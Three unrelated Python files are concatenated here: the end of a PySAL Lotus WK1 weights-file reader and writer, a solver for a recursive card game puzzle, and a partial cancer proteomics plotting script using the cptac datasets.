+-------------+---------------------+-------------------------+-------+-----------------------------+
| [HCOLTYP] |Type of hidcol rec |unsigned short |2 |100 |
| [HCOLLEN] |Length of hidcol rec |unsigned short |2 |32 |
| [HCOLVAL] |Value of hidcol rec |signed char |32 |0*32 |
+-------------+---------------------+-------------------------+-------+-----------------------------+
|[MRG] |margins |
+-------------+---------------------+-------------------------+-------+-----------------------------+
| [MRGTYPE] |Type of margins rec |unsigned short |2 |40 |
| [MRGLEN] |Length of margins rec|unsigned short |2 |10 |
| [MRGVAL] |Value of margins rec |unsigned short |10 |4,76,66,2,2 |
+-------------+---------------------+-------------------------+-------+-----------------------------+
|[LBL] |labels |
+-------------+---------------------+-------------------------+-------+-----------------------------+
| [LBLTYPE] |Type of labels rec |unsigned short |2 |41 |
| [LBLLEN] |Length of labels rec |unsigned short |2 |1 |
| [LBLVAL] |Value of labels rec |char |1 |' |
+-------------+---------------------+-------------------------+-------+-----------------------------+
|[CELL_k] |
+-------------+---------------------+-------------------------+-------+-----------------------------+
| [DTYPE] |Type of cell data |unsigned short |2 |[DTYPE][0]==0: end of file |
| | | | | ==14: number |
| | | | | ==16: formula |
| | | | | ==13: integer |
| | | | | ==11: nrange |
| | | | | ==else: unknown |
| [DLEN] |Length of cell data |unsigned short |2 | |
| [DFORMAT] |Format of cell data |not sure |1 | |
| [CINDEX] |Row, column of cell |unsigned short |4 | |
| [CVALUE] |Value of cell |double, [DTYPE][0]==14 |8 | |
| | |formula,[DTYPE][0]==16 |8 + |[DTYPE][1] - 13 |
| | |integer,[DTYPE][0]==13 |2 | |
| | |nrange, [DTYPE][0]==11 |24 | |
| | |else, [DTYPE][0]==else | |[DTYPE][1] |
| [EOF] |End of file |unsigned short |4 |1,0,0,0 |
+-------------+---------------------+-------------------------+-------+-----------------------------+
"""
FORMATS = ['wk1']
MODES = ['r', 'w']
def __init__(self, *args, **kwargs):
self._varName = 'Unknown'
fileio.FileIO.__init__(self, *args, **kwargs)
self.file = open(self.dataPath, self.mode + 'b')
def _set_varName(self, val):
if issubclass(type(val), str):
self._varName = val
def _get_varName(self):
return self._varName
varName = property(fget=_get_varName, fset=_set_varName)
def read(self, n=-1):
self._complain_ifclosed(self.closed)
return self._read()
def seek(self, pos):
if pos == 0:
self.file.seek(0)
self.pos = 0
def _read(self):
"""
Reads Lotus Wk1 file
Returns
-------
A pysal.weights.weights.W object
Examples
--------
Type 'dir(w)' at the interpreter to see what methods are supported.
Open a Lotus Wk1 file and read it into a pysal weights object
>>> import pysal.lib
>>> w = pysal.lib.io.open(pysal.lib.examples.get_path('spat-sym-us.wk1'),'r').read()
Get the number of observations from the header
>>> w.n
46
Get neighbor distances for a single observation
>>> w[1] == dict({25: 1.0, 3: 1.0, 28: 1.0, 39: 1.0})
True
"""
if self.pos > 0:
raise StopIteration
bof = struct.unpack('<6B', self.file.read(6))
if bof != (0, 0, 2, 0, 6, 4):
raise ValueError('The header of your file is wrong!')
neighbors = {}
weights = {}
dtype, dlen = struct.unpack('<2H', self.file.read(4))
while(dtype != 1):
if dtype in [13, 14, 16]:
self.file.read(1)
row, column = struct.unpack('2H', self.file.read(4))
format, length = '<d', 8
if dtype == 13:
format, length = '<h', 2
value = float(struct.unpack(format, self.file.read(length))[0])
if value > 0:
ngh = neighbors.setdefault(row, [])
ngh.append(column)
wgt = weights.setdefault(row, [])
wgt.append(value)
if dtype == 16:
self.file.read(dlen - 13)
elif dtype == 11:
self.file.read(24)
else:
self.file.read(dlen)
dtype, dlen = struct.unpack('<2H', self.file.read(4))
self.pos += 1
return W(neighbors, weights)
def write(self, obj):
"""
Parameters
----------
.write(weightsObject)
accepts a weights object
Returns
------
a Lotus wk1 file
write a weights object to the opened wk1 file.
Examples
--------
>>> import tempfile, pysal.lib, os
>>> testfile = pysal.lib.io.open(pysal.lib.examples.get_path('spat-sym-us.wk1'),'r')
>>> w = testfile.read()
Create a temporary file for this example
>>> f = tempfile.NamedTemporaryFile(suffix='.wk1')
Reassign to new var
>>> fname = f.name
Close the temporary named file
>>> f.close()
Open the new file in write mode
>>> o = pysal.lib.io.open(fname,'w')
Write the Weights object into the open file
>>> o.write(w)
>>> o.close()
Read in the newly created text file
>>> wnew = pysal.lib.io.open(fname,'r').read()
Compare values from old to new
>>> wnew.pct_nonzero == w.pct_nonzero
True
Clean up temporary file created for this example
>>> os.remove(fname)
"""
self._complain_ifclosed(self.closed)
if issubclass(type(obj), W):
f = self.file
n = obj.n
if n > 256:
raise ValueError('WK1 file format supports only up to 256 observations.')
pack = struct.pack
f.write(pack('<6B', 0, 0, 2, 0, 6, 4))
f.write(pack('<6H', 6, 8, 0, 0, n, n))
f.write(pack('<2H6B', 150, 6, 0, 0, 0, 0, 0, 0))
f.write(pack('<2H1B', 47, 1, 0))
f.write(pack('<2H1b', 2, 1, 0))
f.write(pack('<2H1b', 3, 1, 0))
f.write(pack('<2H1b', 4, 1, 0))
f.write(pack('<2H1b', 5, 1, 0))
f.write(pack('<2H1b', 49, 1, 1))
f.write(pack('<4H2b13H', 7, 32, 0, 0, 113, 0, 10,
n, n, 0, 0, 0, 0, 0, 0, 0, 0, 72, 0))
hidcol = tuple(['<2H32b', 100, 32] + [0] * 32)
f.write(pack(*hidcol))
f.write(pack('<7H', 40, 10, 4, 76, 66, 2, 2))
f.write(pack('<2H1c', 41, 1, "'".encode()))
id2i = obj.id2i
for i, w_i in enumerate(obj):
row = [0.0] * n
for k in w_i[1]:
row[id2i[k]] = w_i[1][k]
for c, v in enumerate(row):
cell = tuple(['<2H1b2H1d', 14, 13, 113, i, c, v])
f.write(pack(*cell))
f.write(pack('<4B', 1, 0, 0, 0))
self.pos += 1
else:
raise TypeError("Expected a pysal weights object, got: %s" % (
type(obj)))
def close(self):
self.file.close()
fileio.FileIO.close(self)
|
import fileinput
from collections import deque
def parse(lines):
it = iter(lines)
line = next(it)
assert line.rstrip() == 'Player 1:'
deck1 = deque()
while (line := next(it)).rstrip():
deck1.append(int(line))
line = next(it)
assert line.rstrip() == 'Player 2:'
deck2 = deque()
while True:
try:
line = next(it)
except StopIteration:
break
deck2.append(int(line))
return deck1, deck2
def part1(lines):
deck1, deck2 = parse(lines)
while deck1 and deck2:
card1 = deck1.popleft()
card2 = deck2.popleft()
if card1 < card2:
deck2.append(card2)
deck2.append(card1)
else:
deck1.append(card1)
deck1.append(card2)
winner = deck1 or deck2
return sum((len(winner) - i) * x for i, x in enumerate(winner))
def part2(lines):
deck1, deck2 = parse(lines)
go(deck1, deck2)
winner = deck1 or deck2
return sum((len(winner) - i) * x for i, x in enumerate(winner))
def go(deck1, deck2):
seen = set()
while deck1 and deck2:
state = tuple(deck1), tuple(deck2)
if state in seen:
return False
seen.add(state)
card1 = deck1.popleft()
card2 = deck2.popleft()
if (go(deque(list(deck1)[:card1]), deque(list(deck2)[:card2]))
if card1 <= len(deck1) and card2 <= len(deck2) else
card1 < card2):
deck2.append(card2)
deck2.append(card1)
else:
deck1.append(card1)
deck1.append(card2)
return not deck1
parts = (part1, part2)
if __name__ == '__main__':
lines = list(fileinput.input())
print(part1(lines))
print(part2(lines))
|
import cptac
import math
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import scipy.stats
import seaborn as sns
import statsmodels.stats.multitest
from statannot import add_stat_annotation
from scipy.stats import pearsonr
def downloadCptac():
# To view available datasets, enter 'cptac.list_data()'.
cptac.list_datasets()
cptac.download(dataset = "endometrial")
cptac.download(dataset = 'colon')
cptac.download(dataset = 'ovarian')
cptac.download(dataset = 'RenalCcrcc')
#cptac.download(dataset ='luad')
#cptac.download(dataset ='brca')
downloadCptac()
endometrialData = cptac.Endometrial()
colorectalData = cptac.Colon()
ovarianData = cptac.Ovarian()
renalData = cptac.RenalCcrcc()
lungData = cptac.Luad()
breastData = cptac.Brca()
def listDataForEachCancer():
print("endometrial")
endometrialData.list_data()
print("\n\ncolorectal")
colorectalData.list_data()
print("\n\novarian")
ovarianData.list_data()
print("\n\nrenal")
renalData.list_data()
listDataForEachCancer()
#################################################################
# Correlation: Proteomics vs Transcriptom in Endometrial Cancer #
#################################################################
def correlationPlot(dataSet, label, omics1, omics2, gene1, gene2):
gene_cross = dataSet.join_omics_to_omics(df1_name = omics1,
df2_name = omics2,
genes1 = gene1,
genes2 = gene2)
print(gene_cross.head())
gene_cross = gene_cross.dropna()
corr = pearsonr(gene_cross.iloc[:, 0],
gene_cross.iloc[:, 1])
corr = [np.round(c, 2) for c in corr]
print(corr)
sns.set(style ="white",
font_scale = 1.5)
plot = sns.regplot(x = gene_cross.columns[0],
y = gene_cross.columns[1],
data = gene_cross)
text = 'r=%s, p=%s' % (corr[0], corr[1])
tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
(plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
plot.text(tl[0], tl[1], text, fontsize = 12)
plot.set(xlabel = gene1 + ' ' + omics1,
ylabel = gene2 + ' ' + omics2,
title = '{} vs {} ({})'.format(gene1, gene2, label))
plt.show()
correlationPlot(dataSet = endometrialData,
label = "Endometrial Cancer",
omics1 = "proteomics",
omics2 = "transcriptomics",
gene1 = "EIF4A1",
gene2 = "VEGFA")
correlationPlot(dataSet = endometrialData,
label = "Endometrial Cancer",
omics1 = "phosphoproteomics_gene",
omics2 = "transcriptomics",
gene1 = "EIF4G1",
gene2 = "EIF4G1")
correlationPlot(dataSet = endometrialData,
label = "Endometrial Cancer",
omics1 = "phosphoproteomics_gene",
omics2 = "proteomics",
gene1 = "EIF4A1",
gene2 = "EIF4A1")
correlationPlot(dataSet = colorectalData,
label = "Colorectal Cancer",
omics1 = "proteomics",
omics2 = "proteomics",
gene1 = "EIF4G1",
gene2 = "EIF4A1")
try:
correlationPlot(dataSet = ovarianData,
label = "Ovarian Cancer",
omics1 = "proteomics",
omics2 = "transcriptomics",
gene1 = "EIF4G1",
gene2 = "EIF4G1")
except Exception as ex:
print('Could not make correlation plot for Ovarian Cancer: ' + str(ex))
######################################################################
# Correlation: Phosphoproteomics vs Proteomics in Endometrial Cancer #
######################################################################
## correlation between 4EBP1-T37 and 4EBP1 protein in endometrial cancer
def siteSpecificCorrelationPlot(dataSet, gene1, gene2, site):
gene_cross_en = dataSet.join_omics_to_omics(
df1_name = "phosphoproteomics",
df2_name = "proteomics",
genes1 = gene1,
genes2 = gene2)
print(gene_cross_en.columns)
gene_cross_en = gene_cross_en.dropna(subset = ['EIF4EBP1-T37_phosphoproteomics'])
print(gene_cross_en.head())
corr = pearsonr(gene_cross_en['EIF4EBP1-T37_phosphoproteomics'],
gene_cross_en[site])
corr = [np.round(c, 2) for c in corr]
print(corr)
sns.set(style ="white",
font_scale = 1.5)
plot = sns.regplot(x = gene_cross_en['EIF4EBP1-T37_phosphoproteomics'],
y = gene_cross_en[site],
data = gene_cross_en)
text = 'r=%s, p=%s' % (corr[0], corr[1])
tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
(plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
plot.text(tl[0], tl[1], text, fontsize=12)
plot.set(xlabel = 'EIF4EBP1-T37 phosphoproteomics',
ylabel = site,
title = 'Phosphoproteomics vs Proteomics (Endometrial Cancer)')
plt.show()
siteSpecificCorrelationPlot(dataSet = endometrialData,
gene1 = "EIF4EBP1",
gene2 = "EIF4EBP1",
site = "EIF4EBP1_proteomics")
'''
## correlation between 4EBP1-T37 and MYC protein in endometrial cancer
def encorrelationplot(gene1, gene2):
gene_cross_en = en.join_omics_to_omics(df1_name = "phosphoproteomics",
df2_name = "proteomics",
genes1 = gene1,
genes2 = gene2)
print(gene_cross_en.head())
gene_cross_en = gene_cross_en.dropna(subset = ['EIF4EBP1-T37_phosphoproteomics'])
print(gene_cross_en.head())
corr = pearsonr(gene_cross_en['EIF4EBP1-T37_phosphoproteomics'],
gene_cross_en['EIF4A1_proteomics'])
corr = [np.round(c, 2) for c in corr]
print(corr)
sns.set(style ="white",
font_scale = 1.5)
plot = sns.regplot(x = gene_cross_en['EIF4EBP1-T37_phosphoproteomics'],
y = gene_cross_en['EIF4A1_proteomics'],
data = gene_cross_en)
text = 'r=%s, p=%s' % (corr[0], corr[1])
tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
(plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
plot.text(tl[0], tl[1], text, fontsize=12)
plot.set(xlabel = 'EIF4EBP1-T37 phosphoproteomics',
ylabel = 'EIF4A1 proteomics',
title = 'Phosphoproteomics vs Proteomics (Endometrial Cancer)')
plt.show()
'''
siteSpecificCorrelationPlot(dataSet = endometrialData,
gene1 = "EIF4EBP1",
gene2 = "EIF4A1",
site = "EIF4A1_proteomics")
#########################################################################
# Association: Clinical Variables with Proteomics in Endometrial Cancer #
#########################################################################
## load the dataframe for clinical results by calling the en.get_clinical() method
en_clinical_data = en.get_clinical()
print(en_clinical_data.columns)
## Clinical Variables with Proteomics
def en_pro_cli_plot(gene):
en_clinical_and_proteomics = en.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "proteomics",
metadata_cols = "tumor_Stage-Pathological",
omics_genes = gene)
en_clinical_and_proteomics["tumor_Stage-Pathological"] = en_clinical_and_proteomics["tumor_Stage-Pathological"].fillna("Normal")
en_clinical_and_proteomics.head()
## Show possible variations of Histologic_type
en_clinical_and_proteomics["tumor_Stage-Pathological"].unique()
sns.set(style ="white",
font_scale = 1.5)
order = ["Normal", "Stage I", "Stage II", "Stage III", "Stage IV"]
ax = sns.boxplot(x = "tumor_Stage-Pathological",
y = gene + '_proteomics',
data = en_clinical_and_proteomics,
showfliers = False,
order = order)
sns.stripplot(x = "tumor_Stage-Pathological",
y = gene + '_proteomics',
data = en_clinical_and_proteomics,
color = '.3',
order = order)
add_stat_annotation(ax,
data = en_clinical_and_proteomics,
x = "tumor_Stage-Pathological",
y = gene + '_proteomics',
order = order,
boxPairList = [("Normal", "Stage I"),
("Normal", "Stage II"),
("Normal", "Stage III"),
("Normal", "Stage IV")],
test = 't-test_ind',
textFormat = 'star',
loc = 'inside',
verbose = 2)
plt.title('endometrial cancer')
en_pro_cli_plot(gene = "EIF4E")
## Clinical Variables with phosphoproteomics
def en_phos_cli_plot(gene):
en_clinical_and_proteomics = en.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "phosphoproteomics",
metadata_cols = "tumor_Stage-Pathological",
omics_genes = gene)
en_clinical_and_proteomics["tumor_Stage-Pathological"] = en_clinical_and_proteomics["tumor_Stage-Pathological"].fillna("Normal")
en_clinical_and_proteomics.head()
## Show possible variations of Histologic_type
en_clinical_and_proteomics["tumor_Stage-Pathological"].unique()
PhosphoSite = list(en_clinical_and_proteomics.filter(like= gene).columns.values.tolist())
for i in PhosphoSite:
print(i)
try:
en_clinical_and_proteomics = en.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "phosphoproteomics",
metadata_cols = "tumor_Stage-Pathological",
omics_genes = gene)
en_clinical_and_proteomics["tumor_Stage-Pathological"] = en_clinical_and_proteomics["tumor_Stage-Pathological"].fillna("Normal")
en_clinical_and_proteomics = en_clinical_and_proteomics.dropna(subset = [i])
plt.figure()
sns.set(style ="white",
font_scale = 1.5)
order = ["Normal", "Stage I", "Stage II", "Stage III", "Stage IV"]
ax = sns.boxplot(x = "tumor_Stage-Pathological",
y = i,
data = en_clinical_and_proteomics,
showfliers = False,
order = order)
sns.stripplot(x = "tumor_Stage-Pathological",
y = i,
data = en_clinical_and_proteomics,
color = '.3',
order = order)
add_stat_annotation(ax,
data = en_clinical_and_proteomics,
x = "tumor_Stage-Pathological",
y = i,
order = order,
boxPairList = [("Normal", "Stage I"),
("Normal", "Stage II"),
("Normal", "Stage III"),
("Normal", "Stage IV")],
test = 't-test_ind',
textFormat = 'star',
loc = 'inside',
verbose = 2)
plt.title('endometrial cancer')
except: ValueError
pass
en_phos_cli_plot(gene = "PIK3CA")
## Clinical Variables with phosphoproteomics total
def en_phos_cli_plot(gene):
en_clinical_and_proteomics = en.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "phosphoproteomics_gene",
metadata_cols = "tumor_Stage-Pathological",
omics_genes = gene)
en_clinical_and_proteomics["tumor_Stage-Pathological"] = en_clinical_and_proteomics["tumor_Stage-Pathological"].fillna("Normal")
en_clinical_and_proteomics.head()
## Show possible variations of Histologic_type
en_clinical_and_proteomics["tumor_Stage-Pathological"].unique()
PhosphoSite = list(en_clinical_and_proteomics.filter(like = gene).columns.values.tolist())
for i in PhosphoSite:
print(i)
en_clinical_and_proteomics = en_clinical_and_proteomics.dropna(subset = [i])
plt.figure()
sns.set(style ="white",
font_scale = 1.5)
order = ["Normal", "Stage I", "Stage II", "Stage III", "Stage IV"]
ax = sns.boxplot(x = "tumor_Stage-Pathological",
y = i,
data = en_clinical_and_proteomics,
showfliers = False,
order = order)
sns.stripplot(x = "tumor_Stage-Pathological",
y = i,
data = en_clinical_and_proteomics,
color = '.3',
order = order)
add_stat_annotation(ax,
data = en_clinical_and_proteomics,
x = "tumor_Stage-Pathological",
y = i,
order = order,
boxPairList = [("Normal", "Stage I"),
("Normal", "Stage II"),
("Normal", "Stage III"),
("Normal", "Stage IV")],
test = 't-test_ind',
textFormat = 'star',
loc = 'inside',
verbose = 2)
plt.title('endometrial cancer')
en_phos_cli_plot(gene = "EIF4EBP1")
## ## Clinical Variables with transcriptomics
def en_trans_cli_plot(gene):
en_clinical_and_proteomics = en.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "transcriptomics",
metadata_cols = "tumor_Stage-Pathological",
omics_genes = gene)
en_clinical_and_proteomics["tumor_Stage-Pathological"] = en_clinical_and_proteomics["tumor_Stage-Pathological"].fillna("Normal")
en_clinical_and_proteomics.head()
## Show possible variations of Histologic_type
en_clinical_and_proteomics["tumor_Stage-Pathological"].unique()
sns.set(style ="white",
font_scale = 1.5)
order = ["Normal", "Stage I", "Stage II", "Stage III", "Stage IV"]
ax = sns.boxplot(x = "tumor_Stage-Pathological",
y = gene + '_transcriptomics',
data = en_clinical_and_proteomics,
showfliers = False,
order = order)
sns.stripplot(x = "tumor_Stage-Pathological",
y = gene + '_transcriptomics',
data = en_clinical_and_proteomics,
color = '.3',
order = order)
add_stat_annotation(ax,
data = en_clinical_and_proteomics,
x = "tumor_Stage-Pathological",
y = gene + '_transcriptomics',
order = order,
boxPairList = [("Normal", "Stage I"),
("Normal", "Stage II"),
("Normal", "Stage III"),
("Normal", "Stage IV")],
test = 't-test_ind',
textFormat = 'star',
loc = 'inside',
verbose = 2)
plt.title('endometrial cancer')
en_trans_cli_plot(gene = "EIF4E")
## Merge clinical attribute with transcriptomics dataframe
def en_trans_cli_plot(gene):
en_clinical_and_proteomics = en.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "transcriptomics",
metadata_cols = "Proteomics_Tumor_Normal",
omics_genes = gene)
en_clinical_and_proteomics.head()
## Show possible variations of Histologic_type
en_clinical_and_proteomics["Proteomics_Tumor_Normal"].unique()
sns.set(style ="white",
font_scale = 1.5)
ax = sns.boxplot(x = "Proteomics_Tumor_Normal",
y = gene + '_transcriptomics',
data = en_clinical_and_proteomics,
showfliers = False)
sns.stripplot(x = "Proteomics_Tumor_Normal",
y = gene + '_transcriptomics',
data = en_clinical_and_proteomics,
color = '.3')
add_stat_annotation(ax,
data = en_clinical_and_proteomics,
x = "Proteomics_Tumor_Normal",
y = gene + '_transcriptomics',
boxPairList = [("Tumor", "Adjacent_normal")],
test = 't-test_ind',
textFormat = 'star',
loc = 'inside',
verbose = 2)
plt.title('endometrial cancer')
en_trans_cli_plot(gene = "EIF4E")
###################################################################
## Associating Clinical Variables with proteomics in colon cancer##
###################################################################
### load the dataframe for clinical results by calling the en.get_clinical() method
col_clinical_data = col.get_clinical()
print(col_clinical_data.columns)
## Choose Clinical Attribute and Merge Dataframes
col_clinical_attribute = "Stage"
## Merge clinical attribute with proteomics dataframe
## Merge clinical attribute with proteomics dataframe
def col_pro_cli_plot(gene):
col_clinical_and_proteomics = col.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "proteomics",
metadata_cols = "Stage",
omics_genes = gene)
col_clinical_and_proteomics["Stage"] = col_clinical_and_proteomics["Stage"].fillna("Normal")
col_clinical_and_proteomics.head()
## Show possible variations of Histologic_type
col_clinical_and_proteomics["Stage"].unique()
sns.set(style ="white",
font_scale = 1.5)
order = ["Normal", "Stage I", "Stage II", "Stage III", "Stage IV"]
ax = sns.boxplot(x = "Stage",
y = gene + '_proteomics',
data = col_clinical_and_proteomics,
showfliers = False,
order = order)
ax = sns.stripplot(x = "Stage",
y = gene + '_proteomics',
data = col_clinical_and_proteomics,
color = '.3',
order = order)
add_stat_annotation(ax,
data = col_clinical_and_proteomics,
x = "Stage",
y = gene + '_proteomics',
order = order,
boxPairList = [("Normal", "Stage I"),
("Normal", "Stage II"),
("Normal", "Stage III"),
("Normal", "Stage IV")],
test = 't-test_ind',
textFormat = 'star',
loc = 'inside',
verbose = 2)
plt.title('colon cancer')
col_pro_cli_plot(gene = "EIF4E")
###########################################################################
## Associating Clinical Variables with Phosphoproteomics in colon cancer ##
###########################################################################
def col_pho_cliplot(gene):
col_clinical_and_proteomics = col.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "phosphoproteomics",
metadata_cols = "Stage")
col_clinical_and_proteomics["Stage"] = col_clinical_and_proteomics["Stage"].fillna("Normal")
col_clinical_and_proteomics.head()
## Show possible variations of Histologic_type
col_clinical_and_proteomics["Stage"].unique()
PhosphoSite = list(col_clinical_and_proteomics.filter(like = gene).columns.values.tolist())
for i in PhosphoSite:
try:
print(i)
col_clinical_and_proteomics = col.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "phosphoproteomics",
metadata_cols = "Stage")
col_clinical_and_proteomics["Stage"] = col_clinical_and_proteomics["Stage"].fillna("Normal")
col_clinical_and_proteomics = col_clinical_and_proteomics.dropna(subset = [i])
plt.figure()
sns.set(style ="white",
font_scale = 1.5)
order = ["Normal",
"Stage I",
"Stage II",
"Stage III",
"Stage IV"]
ax = sns.boxplot(x = "Stage",
y = i,
data = col_clinical_and_proteomics,
showfliers = False,
order = order)
sns.stripplot(x = "Stage",
y = i,
data = col_clinical_and_proteomics,
color = '.3',
order = order)
add_stat_annotation(ax,
data = col_clinical_and_proteomics,
x = "Stage",
y = i,
order = order,
boxPairList = [("Normal", "Stage I"),
("Normal", "Stage II"),
("Normal", "Stage III"),
("Normal", "Stage IV")],
test = 't-test_ind',
textFormat = 'star',
loc = 'inside',
verbose = 2)
plt.title('colon cancer')
except: ValueError
pass
col_pho_cliplot(gene = "MKNK2_")
#########################################################################
## Associating Clinical Variables with Transcriptomics in colon cancer ##
#########################################################################
def col_tra_cli_plot(gene):
col_clinical_and_proteomics = col.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "transcriptomics",
metadata_cols = "Stage",
omics_genes = gene)
col_clinical_and_proteomics["Stage"] = col_clinical_and_proteomics["Stage"].fillna("Normal")
col_clinical_and_proteomics.head()
## Show possible variations of Histologic_type
col_clinical_and_proteomics["Stage"].unique()
sns.set(style ="white",
font_scale = 1.5)
order = ["Normal",
"Stage I",
"Stage II",
"Stage III",
"Stage IV"]
ax = sns.boxplot(x = "Stage",
y = gene + '_transcriptomics',
data = col_clinical_and_proteomics,
showfliers = False,
order = order)
ax = sns.stripplot(x = "Stage",
y = gene + '_transcriptomics',
data = col_clinical_and_proteomics,
color = '.3',
order = order)
add_stat_annotation(ax,
data = col_clinical_and_proteomics,
x = "Stage",
y = gene + '_transcriptomics',
order = order,
boxPairList = [("Normal", "Stage I"),
("Normal", "Stage II"),
("Normal", "Stage III"),
("Normal", "Stage IV")],
test = 't-test_ind',
textFormat = 'star',
loc = 'inside',
verbose = 2)
plt.title('colon cancer')
col_tra_cli_plot(gene = "MKNK1")
def col_tra_cli_plot(gene):
col_clinical_and_proteomics = col.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "transcriptomics",
metadata_cols = "Stage",
omics_genes = gene)
col_clinical_and_proteomics["Stage"] = col_clinical_and_proteomics["Stage"].fillna("Normal")
col_clinical_and_proteomics.head()
## Show possible variations of Histologic_type
col_clinical_and_proteomics["Stage"].unique()
sns.set(style ="white",
font_scale = 1.5)
order = ["Stage I",
"Stage II",
"Stage III",
"Stage IV"]
ax = sns.boxplot(x = "Stage",
y = gene + '_transcriptomics',
data = col_clinical_and_proteomics,
showfliers = False,
order = order)
sns.stripplot(x = "Stage",
y = gene + '_transcriptomics',
data = col_clinical_and_proteomics,
color = '.3',
order = order)
add_stat_annotation(ax,
data = col_clinical_and_proteomics,
x = "Stage",
y = gene + '_transcriptomics',
order = order,
boxPairList = [("Stage I", "Stage II"),
("Stage I", "Stage III"),
("Stage I", "Stage IV")],
test = 't-test_ind',
textFormat = 'star',
loc = 'inside',
verbose = 2)
plt.title('colon cancer')
col_tra_cli_plot(gene = "EIF4E")
#####################################################################
## Associating Clinical Variables with Proteomics in ovarian cancer##
#####################################################################
## load the dataframe for clinical results by calling the en.get_clinical() method
ov_clinical_data = ov.get_clinical()
print(ov_clinical_data.columns)
## Choose Clinical Attribute and Merge Dataframes
ov_clinical_attribute = "Sample_Tumor_Normal"
## Merge clinical attribute with proteomics dataframe
def ov_pro_cli_plot(gene):
ov_clinical_and_proteomics = ov.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "proteomics",
metadata_cols = "Sample_Tumor_Normal",
omics_genes = gene)
ov_clinical_and_proteomics.head()
cols = []
count = 1
for column in ov_clinical_and_proteomics.columns:
if column == gene + '_proteomics':
cols.append(gene + '_proteomics'+ str(count))
count+=1
continue
cols.append(column)
ov_clinical_and_proteomics.columns = cols
## Show possible variations of Histologic_type
ov_clinical_and_proteomics["Sample_Tumor_Normal"].unique()
Genes = list(ov_clinical_and_proteomics.filter(like = gene).columns.values.tolist())
for i in Genes:
print(i)
ov_clinical_and_proteomics = ov.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "proteomics",
metadata_cols = "Sample_Tumor_Normal",
omics_genes = gene)
cols = []
count = 1
for column in ov_clinical_and_proteomics.columns:
if column == gene + '_proteomics':
cols.append(gene + '_proteomics'+ str(count))
count+=1
continue
cols.append(column)
ov_clinical_and_proteomics.columns = cols
ov_clinical_and_proteomics = ov_clinical_and_proteomics.dropna(subset = [i])
plt.figure()
sns.set(style ="white",
font_scale = 1.5)
order = ["Normal", "Tumor"]
ax = sns.boxplot(x = "Sample_Tumor_Normal",
y = i,
data = ov_clinical_and_proteomics,
showfliers = False,
order = order)
ax = sns.stripplot(x = "Sample_Tumor_Normal",
y = i,
data = ov_clinical_and_proteomics,
color = '.3',
order = order)
add_stat_annotation(ax,
data = ov_clinical_and_proteomics,
x = "Sample_Tumor_Normal",
y = i,
order = order,
boxPairList = [("Normal", "Tumor")],
test = 't-test_ind',
textFormat = 'star',
loc = 'inside',
verbose = 2)
plt.title('ovarian cancer')
ov_pro_cli_plot(gene = "EIF4E")
############################################################################
## Associating Clinical Variables with Phosphoproteomics in ovarian cancer##
############################################################################
def ov_pho_cli_plot(gene):
ov_clinical_and_proteomics = ov.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "phosphoproteomics",
metadata_cols = "Sample_Tumor_Normal",
omics_genes = gene)
ov_clinical_and_proteomics.head()
ov_clinical_and_proteomics = ov_clinical_and_proteomics.loc[:, ~ov_clinical_and_proteomics.columns.duplicated()]
## Show possible variations of Histologic_type
ov_clinical_and_proteomics["Sample_Tumor_Normal"].unique()
Genes = list(ov_clinical_and_proteomics.filter(like = gene).columns.values.tolist())
for i in Genes:
print(i)
ov_clinical_and_proteomics = ov.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "phosphoproteomics",
metadata_cols = "Sample_Tumor_Normal",
omics_genes = gene)
ov_clinical_and_proteomics = ov_clinical_and_proteomics.loc[:, ~ov_clinical_and_proteomics.columns.duplicated()]
ov_clinical_and_proteomics = ov_clinical_and_proteomics.dropna(subset = [i])
plt.figure()
sns.set_style("white")
order = ["Normal", "Tumor"]
ax = sns.boxplot(x = "Sample_Tumor_Normal",
y = i,
data = ov_clinical_and_proteomics,
showfliers = False,
order = order)
sns.stripplot(x = "Sample_Tumor_Normal",
y = i,
data = ov_clinical_and_proteomics,
color = '.3',
order = order)
add_stat_annotation(ax,
data = ov_clinical_and_proteomics,
x = "Sample_Tumor_Normal",
y = i,
order = order,
boxPairList = [("Normal", "Tumor")],
test = 't-test_ind',
textFormat = 'star',
loc = 'inside',
verbose = 2)
plt.title('ovarian cancer')
ov_pho_cli_plot(gene = "EIF4EBP1")
def ovcliplot(gene):
ov_clinical_and_proteomics = ov.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "phosphoproteomics",
# metadata_cols = "Tumor_Stage_Ovary_FIGO",
omics_genes = gene)
ov_clinical_and_proteomics["Tumor_Stage_Ovary_FIGO"] = ov_clinical_and_proteomics["Tumor_Stage_Ovary_FIGO"].fillna("Normal")
ov_clinical_and_proteomics.head()
## Show possible variations of Histologic_type
ov_clinical_and_proteomics["Tumor_Stage_Ovary_FIGO"].unique()
PhosphoSite = list(ov_clinical_and_proteomics.filter(like = gene).columns.values.tolist())
for i in PhosphoSite:
print(i)
ov_clinical_and_proteomics = ov.join_metadata_to_omics(
metadata_df_name = "clinical",
omics_df_name = "phosphoproteomics",
# metadata_cols = "Tumor_Stage_Ovary_FIGO",
omics_genes = gene)
